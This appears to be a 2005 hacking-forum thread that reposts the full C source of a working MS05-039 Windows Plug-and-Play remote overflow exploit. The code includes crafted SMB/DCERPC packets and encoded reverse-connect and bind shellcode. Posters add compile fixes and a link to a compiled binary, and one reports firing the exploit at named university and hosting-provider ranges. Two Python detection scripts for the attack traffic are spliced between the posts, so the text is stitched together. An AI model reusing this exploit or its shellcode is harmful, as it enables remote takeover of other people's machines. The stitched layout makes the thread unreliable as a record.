    if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); }
    printf("ok\n");

    /* open \browser pipe, then DCERPC bind to the PnP interface over it */
    printf("[*] bind pipe...");
    if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); }

    if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); }
    printf("ok\n");

    printf("[*] sending crafted packet...");

    // nop
    ptr = packet;
    memset(packet, '\x90', sizeof(packet));

    // header & offsets
    memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
    ptr += sizeof(RPC_call)-1;

    if (argc > 3) {
        /* reverse shellcode: port and IP are stored XOR 0x99, matching the decoder loop */
        bindport = htons(atoi(argv[2]))^(unsigned short)0x9999;
        ip = inet_addr(argv[3])^(unsigned long)0x99999999;
        memcpy(&reverse_shellcode[118], &bindport, 2);
        memcpy(&reverse_shellcode[111], &ip, 4);
        memcpy(ptr, reverse_shellcode, sizeof(reverse_shellcode)-1);
    } else {
        // shellcode
        bindport = (unsigned short)atoi(argv[2]);
        bindport ^= 0x0437;
        SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
        memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
    }

    // end of packet
    memcpy(packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1);

    // sending...
    if (send(sockfd, packet, 2196, 0) < 0) { printf("\n[-] send failed\n"); exit(0); }
    printf("ok\n");

    if (argc > 3) {
        printf("[*] check your shell on %s:%i\n", argv[3], atoi(argv[2]));
    } else {
        printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
    }

    recv(sockfd, recvbuf, 4096, 0);

    return 0;
}
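As an added defender-side example (not code from the thread or from houseofdabus), the Python below parses the SMB Trans / DCE/RPC layering that the exploit's SMB_PNPEndpoint and RPC_call packets use, and flags a bind to the PnP interface UUID followed by an oversized request on the same pipe. The bind sample is the SMB_PNPEndpoint byte string from the source above; the request frame, the 1024-byte stub threshold and the helper names are constructed assumptions.

```python
import struct
import uuid

# Plug-and-Play RPC interface from the thread's SMB_PNPEndpoint bind (8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0)
PNP_UUID = uuid.UUID("8d9f4e40-a03d-11ce-8f69-08003e30051b")
SMB_COM_TRANSACTION = 0x25          # both the bind and the crafted call ride on SMB Trans (TransactNmPipe)
DCERPC_REQUEST, DCERPC_BIND = 0x00, 0x0B
# The crafted request in the thread carries roughly 2 KB of stub data; anything near that
# size on the PnP pipe is worth an alert. The threshold itself is an assumption.
STUB_ALERT_BYTES = 1024


def smb_trans_data(frame: bytes):
    """Return the Data section of an SMB_COM_TRANSACTION inside a NetBIOS session frame, else None."""
    if len(frame) < 4 or frame[0] != 0x00:                   # NetBIOS session message, 3-byte length
        return None
    smb = frame[4:4 + int.from_bytes(frame[1:4], "big")]
    if len(smb) < 33 or smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_TRANSACTION:
        return None
    word_count = smb[32]
    words = smb[33:33 + 2 * word_count]
    if word_count < 14 or len(words) < 26:
        return None
    # Trans words: TotalParamCount TotalDataCount MaxParamCount MaxDataCount (2 each),
    # MaxSetupCount Reserved (1 each), Flags(2) Timeout(4) Reserved2(2) ParamCount(2)
    # ParamOffset(2) DataCount(2) DataOffset(2): DataCount at +22, DataOffset at +24.
    data_count, data_offset = struct.unpack_from("<HH", words, 22)
    if data_offset + data_count > len(smb):                  # offsets are relative to the SMB header
        return None
    return smb[data_offset:data_offset + data_count]


def inspect_dcerpc(pdu: bytes):
    """Summarise a connection-oriented DCE/RPC bind or request PDU; None for anything else."""
    if len(pdu) < 16 or pdu[0] != 5:                          # RPC version 5 common header
        return None
    ptype = pdu[2]
    frag_len = struct.unpack_from("<H", pdu, 8)[0]
    if ptype == DCERPC_BIND and len(pdu) >= 52:
        # header(16) max_xmit(2) max_recv(2) assoc_group(4) n_ctx(1)+pad(3)
        # ctx_id(2) n_transfer(1)+pad(1) abstract_syntax UUID(16) version(2+2)
        interface = uuid.UUID(bytes_le=pdu[32:48])
        major, minor = struct.unpack_from("<HH", pdu, 48)
        return {"ptype": "bind", "interface": str(interface),
                "version": f"{major}.{minor}", "pnp": interface == PNP_UUID}
    if ptype == DCERPC_REQUEST and len(pdu) >= 24:
        # header(16) alloc_hint(4) context_id(2) opnum(2), then the marshalled stub
        _hint, _ctx, opnum = struct.unpack_from("<IHH", pdu, 16)
        stub_len = max(0, min(frag_len, len(pdu)) - 24)
        return {"ptype": "request", "opnum": opnum, "stub_len": stub_len,
                "oversized": stub_len >= STUB_ALERT_BYTES}
    return None


def monitor_pipe(frames):
    """Walk one SMB session's frames in order; alert on a PnP bind followed by an oversized call."""
    alerts, pnp_bound = [], False
    for frame in frames:
        data = smb_trans_data(frame)
        info = inspect_dcerpc(data) if data else None
        if info is None:
            continue
        if info["ptype"] == "bind" and info["pnp"]:
            pnp_bound = True
            alerts.append(f"bind to PnP interface {info['interface']} v{info['version']}")
        elif info["ptype"] == "request" and pnp_bound and info["oversized"]:
            alerts.append(f"oversized PnP request: opnum {info['opnum']}, {info['stub_len']} stub bytes")
    return alerts


# Sample bind frame: the SMB_PNPEndpoint byte string from the exploit source posted above.
PNP_BIND_FRAME = bytes.fromhex(
    "0000009cff534d4225000000001807c8" "00000000000000000000000000087804"
    "00085000100000480000000010000000" "00000000000000000054004800540002"
    "00260000405900005c00500049005000" "45005c000000400005000b0310000000"
    "4800000001000000b810b81000000000" "0100000000000100404e9f8d3da0ce11"
    "8f6908003e30051b01000000045d888a" "eb1cc9119fe808002b10486002000000")


def make_request_pdu(opnum: int, stub: bytes) -> bytes:
    """Constructed test vector: a minimal DCE/RPC request PDU carrying the given stub."""
    return struct.pack("<BBBB4sHHIIHH", 5, 0, DCERPC_REQUEST, 0x03, b"\x10\x00\x00\x00",
                       24 + len(stub), 0, 1, len(stub), 0, opnum) + stub


def wrap_in_trans(pdu: bytes) -> bytes:
    """Constructed test vector: carry pdu in a copy of the bind frame's SMB Trans header."""
    head = bytearray(PNP_BIND_FRAME[:88])                 # NetBIOS + SMB header + words + pipe name + pad
    head[1:4] = (84 + len(pdu)).to_bytes(3, "big")        # NetBIOS length: 84 SMB bytes precede the data
    struct.pack_into("<H", head, 39, len(pdu))            # TotalDataCount
    struct.pack_into("<H", head, 59, len(pdu))            # DataCount
    struct.pack_into("<H", head, 69, 17 + len(pdu))       # ByteCount: pad + "\PIPE\" name + pad = 17
    return bytes(head) + pdu


if __name__ == "__main__":
    # opnum 54 (0x36) is the value in the thread's RPC_call header; the filler stub is constructed.
    session = [PNP_BIND_FRAME, wrap_in_trans(make_request_pdu(54, b"A" * 2048))]
    for line in monitor_pipe(session):
        print(line)
```

A real sensor would key the `pnp_bound` state per TCP session and pipe FID; here one list of frames stands in for one session.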
rpm
Aug 17 2005, 10:28 AM
Fancy working out a way to add multiple offsets
EviL
Aug 17 2005, 10:32 AM
QUOTE(pita @ Aug 17 2005, 10:24 AM) I was bored this morning, so I thought why not make life easier; this is the houseofdabus exploit modified with the 0x1013C79 ret and a reverse shellcode added. CODE [same source as in pita's post above]
unsigned char SMB_TreeConnectAndX[] = "\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";
unsigned char SMB_TreeConnectAndX_[] = "\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";
/* browser */ unsigned char SMB_PipeRequest_browser[] = "\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" "\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00" "\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" "\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00" "\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";
unsigned char SMB_PNPEndpoint[] = /* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */ "\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" "\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02" "\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00" "\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00" "\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11" "\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A" "\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";
unsigned char RPC_call[] = "\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" "\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02" "\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00" "\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00" "\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00" "\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00" "\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00" "\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
/* jmp over - entry point */ "\xEB\x08\x90\x90"
/* pop reg; pop reg; retn; - services.exe (0x01013C79, found with sac.exe above; the umpnpmgr.dll address was 0x767a1567) */ "\x79\x3C\x01\x01"
/* jmp ebx - umpnpmgr.dll "\x6f\x36\x7a\x76" */
"\xEB\x08\x90\x90\x67\x15\x7a\x76" "\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char RPC_call_end[] = "\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";
unsigned char reverse_shellcode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99" "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12" "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99" "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9" "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D" "\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA" "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32" "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10" "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8" "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66" "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5" "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8" "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A" "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12" "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A" "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C" "\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33" "\xF9\x7E\xE0\x5F\xE0";
unsigned char bind_shellcode[] = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19" "\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8" "\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc" "\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae" "\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f" "\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc" "\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc" "\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67" "\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7" "\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35" "\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64" "\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6" "\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f" "\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e" "\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60" "\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67" "\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a" "\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8" "\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66" "\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7" "\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57" "\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";
#define SET_PORTBIND_PORT(buf, port) \
    *(unsigned short *)(((buf)+186)) = (port)

/* write name into out as UTF-16LE, filling from the back */
void convert_name(char *out, char *name)
{
    unsigned long len;

    len = strlen(name);
    out += len * 2 - 1;
    while (len--) {
        *out-- = '\x00';
        *out-- = name[len];
    }
}

int main (int argc, char **argv)
{
    struct sockaddr_in addr;
    struct hostent *he;
    int len;
    int sockfd;
    unsigned short smblen;
    unsigned short bindport;
    unsigned long ip;
    unsigned char tmp[1024];
    unsigned char packet[4096];
    unsigned char *ptr;
    char recvbuf[4096];

#ifdef _WIN32
    WSADATA wsa;
    WSAStartup(MAKEWORD(2,0), &wsa);
#endif

    printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
    printf("\t Universal Exploit (0x01013C79) + reverse and bind shellcode\n\n\n");
    printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");

    if (argc < 3) {
        printf("HOD-ms05039-pnp-expl.exe <host> <bindport> [connectback IP]\n");
        exit(0);
    }

    if ((he = gethostbyname(argv[1])) == NULL) {
        printf("[-] Unable to resolve %s\n", argv[1]);
        exit(0);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("[-] socket failed\n");
        exit(0);
    }

    addr.sin_family = AF_INET;
    addr.sin_port = htons(445);
    addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(addr.sin_zero), '\0', 8);

    printf("\n[*] connecting to %s:445...", argv[1]);
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
        printf("\n[-] connect failed\n");
        exit(0);
    }
    printf("ok\n");

    printf("[*] null session...");
    if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }

    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }

    if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }

    len = recv(sockfd, recvbuf, 4096, 0);
    if (len <= 10) {
        printf("\n[-] failed\n");
        exit(0);
    }

    if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }

    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }

    ptr = packet;
    memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
    ptr += sizeof(SMB_TreeConnectAndX)-1;

    /* \\host\IPC$ as UTF-16LE; casts added since tmp/ptr are unsigned char */
    sprintf((char *)tmp, "\\\\%s\\IPC$", argv[1]);
    convert_name((char *)ptr, (char *)tmp);
    smblen = strlen((char *)tmp)*2;
    ptr += smblen;
    smblen += 9;
    memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);  /* low byte only: ByteCount */

    memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
    ptr += sizeof(SMB_TreeConnectAndX_)-1;

    smblen = ptr-packet;
    smblen -= 4;
    memcpy(packet+3, &smblen, 1);  /* low byte only: NetBIOS session length */

    if (send(sockfd, packet, ptr-packet, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }

    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }

    printf("ok\n");
    printf("[*] bind pipe...");

    if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }

    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }

    if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }

    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
        printf("\n[-] failed\n");
        exit(0);
    }

    printf("ok\n");
    printf("[*] sending crafted packet...");

    // nop
    ptr = packet;
    memset(packet, '\x90', sizeof(packet));

    // header & offsets
    memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
    ptr += sizeof(RPC_call)-1;

    if (argc > 3) {
        /* the original casts used USHORT/ULONG, Win32 typedefs that are
           undefined under cygwin/gcc; unsigned short/unsigned long are
           the same types */
        bindport = htons(atoi(argv[2]))^(unsigned short)0x9999;
        ip = inet_addr(argv[3])^(unsigned long)0x99999999;
        memcpy(&reverse_shellcode[118], &bindport, 2);
        memcpy(&reverse_shellcode[111], &ip, 4);
        memcpy(ptr, reverse_shellcode, sizeof(reverse_shellcode)-1);
    } else {
        // shellcode
        bindport = (unsigned short)atoi(argv[2]);
        bindport ^= 0x0437;
        SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
        memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
    }

    // end of packet
    memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1);

    // sending...
    if (send(sockfd, packet, 2196, 0) < 0) {
        printf("\n[-] send failed\n");
        exit(0);
    }
    printf("ok\n");

    if (argc > 3) {
        printf("[*] check your shell on %s:%i\n", argv[3], atoi(argv[2]));
    } else {
        printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
    }

    recv(sockfd, recvbuf, 4096, 0);

    return 0;
}
I've tried to compile with cygwin and I have some errors.
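From the defender's side, the exchange above has a fixed shape on the wire: a DCERPC bind to the PnP interface UUID carried in SMB_PNPEndpoint, followed by one request to opnum 54 (the "\x36\x00" in the RPC_call header) whose stub is far larger than any legitimate call. The following Python is an added detection example, not part of the original post or the exploit: it decodes DCERPC bind and request headers and flags that pattern on a single connection. The alert threshold, the PDU builder helpers and the srvsvc contrast sample are my assumptions; the embedded 72-byte bind PDU is the DCERPC portion of SMB_PNPEndpoint above.

```python
"""Flag DCERPC traffic that binds to the Plug and Play interface and then
sends an oversized request to opnum 54, the shape of the exchange above."""
import struct
import uuid

PNP_UUID = uuid.UUID("8d9f4e40-a03d-11ce-8f69-08003e30051b")    # from SMB_PNPEndpoint
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")  # standard NDR transfer syntax
SRVSVC_UUID = uuid.UUID("4b324fc8-1670-01d3-1278-5a47bf6ee188") # unrelated interface, for contrast
PNP_OPNUM_54 = 0x36        # opnum carried by the RPC_call header above
STUB_ALERT_BYTES = 1024    # assumption: alert threshold, well above legitimate stub sizes
PTYPE_REQUEST, PTYPE_BIND = 0, 11
HDR = "<BBBBIHHI"          # version, minor, ptype, flags, drep, frag_len, auth_len, call_id


def parse_pdu(buf):
    """Decode one connection-oriented DCERPC PDU; returns None if malformed."""
    if len(buf) < 16:
        return None
    ver, _minor, ptype, _flags, _drep, frag_len, auth_len, call_id = struct.unpack_from(HDR, buf, 0)
    if ver != 5 or frag_len > len(buf) or frag_len < 16:
        return None
    pdu = {"ptype": ptype, "call_id": call_id, "frag_len": frag_len}
    if ptype == PTYPE_BIND and frag_len >= 28:
        n_ctx = buf[24]                      # follows max_xmit, max_recv, assoc_group
        off, ifaces = 28, []
        for _ in range(n_ctx):
            if off + 24 > frag_len:
                return None
            _ctx_id, n_ts = struct.unpack_from("<HB", buf, off)
            ifaces.append(uuid.UUID(bytes_le=bytes(buf[off + 4:off + 20])))
            off += 24 + 20 * n_ts            # abstract syntax + n transfer syntaxes
        pdu["ifaces"] = ifaces
    elif ptype == PTYPE_REQUEST and frag_len >= 24:
        _alloc_hint, _ctx_id, opnum = struct.unpack_from("<IHH", buf, 16)
        pdu["opnum"] = opnum
        pdu["stub_len"] = frag_len - 24 - auth_len
    return pdu


def detect_pnp_overflow_attempt(pdus):
    """Scan one connection's PDUs in order. Returns the suspicious stub length
    when a bind to the PnP interface is followed by an opnum-54 request whose
    stub is at least STUB_ALERT_BYTES, else None."""
    bound_to_pnp = False
    for raw in pdus:
        pdu = parse_pdu(raw)
        if pdu is None:
            continue
        if pdu["ptype"] == PTYPE_BIND:
            bound_to_pnp = PNP_UUID in pdu.get("ifaces", [])
        elif (bound_to_pnp and pdu["ptype"] == PTYPE_REQUEST
              and pdu["opnum"] == PNP_OPNUM_54
              and pdu["stub_len"] >= STUB_ALERT_BYTES):
            return pdu["stub_len"]
    return None


def build_bind(if_uuid, call_id=1):
    """Construct a minimal bind PDU with one context (test input only)."""
    body = struct.pack("<HHI", 4280, 4280, 0) + struct.pack("<BBH", 1, 0, 0)
    body += struct.pack("<HBB", 0, 1, 0) + if_uuid.bytes_le + struct.pack("<I", 1)
    body += NDR_SYNTAX.bytes_le + struct.pack("<I", 2)
    return struct.pack(HDR, 5, 0, PTYPE_BIND, 3, 0x10, 16 + len(body), 0, call_id) + body


def build_request(opnum, stub, call_id=1):
    """Construct a request PDU carrying `stub` (test input only)."""
    hdr = struct.pack(HDR, 5, 0, PTYPE_REQUEST, 3, 0x10, 24 + len(stub), 0, call_id)
    return hdr + struct.pack("<IHH", len(stub), 0, opnum) + stub


# The bind PDU embedded in SMB_PNPEndpoint above (DCERPC part only, 72 bytes).
PAGE_BIND_PDU = bytes.fromhex(
    "05000b0310000000" "4800000001000000" "b810b81000000000"
    "0100000000000100" "404e9f8d3da0ce11" "8f6908003e30051b"
    "01000000045d888a" "eb1cc9119fe80800" "2b10486002000000")

# Constructed samples: the page's bind followed by a request of the size
# RPC_call sends (0x083C - 24 = 2084 bytes) with a zero-filled stub in place
# of the real payload; a small request and another interface for contrast.
SAMPLE_SUSPECT = [PAGE_BIND_PDU, build_request(PNP_OPNUM_54, b"\x00" * 2084)]
SAMPLE_SMALL = [PAGE_BIND_PDU, build_request(PNP_OPNUM_54, b"\x00" * 64)]
SAMPLE_OTHER = [build_bind(SRVSVC_UUID), build_request(PNP_OPNUM_54, b"\x00" * 2084)]

if __name__ == "__main__":
    for name, pdus in [("suspect", SAMPLE_SUSPECT), ("small", SAMPLE_SMALL), ("other", SAMPLE_OTHER)]:
        print(name, detect_pnp_overflow_attempt(pdus))
```

The parser assumes unfragmented PDUs without an auth trailer, which is what the packets above use; a capture with SMB framing still needs the NetBIOS/SMB headers stripped first.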
tikbalang
Aug 17 2005, 10:38 AM
Having problems compiling this modified version too.
Maybe a compiled version would help.
-tikz
PrOzHaCk
Aug 17 2005, 10:56 AM
To compile, change USHORT to unsigned short and ULONG to unsigned long.
Hehe0815
Aug 17 2005, 10:59 AM
*lol* sry, was a little bit confused, but didn't get an error while compiling, changed like above: http://web270.cyberwebserver-04.de/expl.exe
majestic
Aug 17 2005, 11:20 AM
There's something that I can't solve, maybe some of you can. There are some ranges like (washington.edu) 128.95 that have some protection. When I say protection I mean that the exploit doesn't affect their computers. That's what happens when you try:
[*] connecting to 128.95.x.x:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 128.95.x.x:7400
Account Deleted For Naming Targets
brOmstar
Aug 17 2005, 11:28 AM
How stupid are you? You tell us that you are trying to hack the University of Washington and also rackspace.com. Hope your account will get deleted as fast as possible.
The protection will be the patch...[Filtered by andydis]
majestic
Aug 17 2005, 11:36 AM
QUOTE(brOmstar @ Aug 17 2005, 11:28 AM) How stupid are you? You tell us that you are trying to hack the University of Washington and also rackspace.com. Hope your account will get deleted as fast as possible. The protection will be the patch...idiot.
You see how much of an idiot you are? You don't even know wtf I'm talking about. If it's patched, it shouldn't get stuck, idiot. Anyway, try it yourself before you talk like an [filtered by andydis]
Edited by Andydis: Majestic, try to respect all the users here; earned some warn points.
apoc_neo
Aug 17 2005, 11:36 AM
QUOTE(majestic @ Aug 17 2005, 11:20 AM) There's something that I can't solve, maybe some of you can. There are some ranges like (washington.edu) 128.95 that have some protection. When I say protection I mean that the exploit doesn't affect their computers. That's what happens when you try: [*] connecting to 128.95.x.x:445...ok [*] null session...ok [*] bind pipe...ok [*] sending crafted packet...ok [*] check your shell on 128.95.x.x:7400 It gets stuck as usual, but it never opens the port on any of their computers. RACKSPACE.com servers have this protection too. How can I make this protection on my net-range and is it possible to pass it? If it is, how?
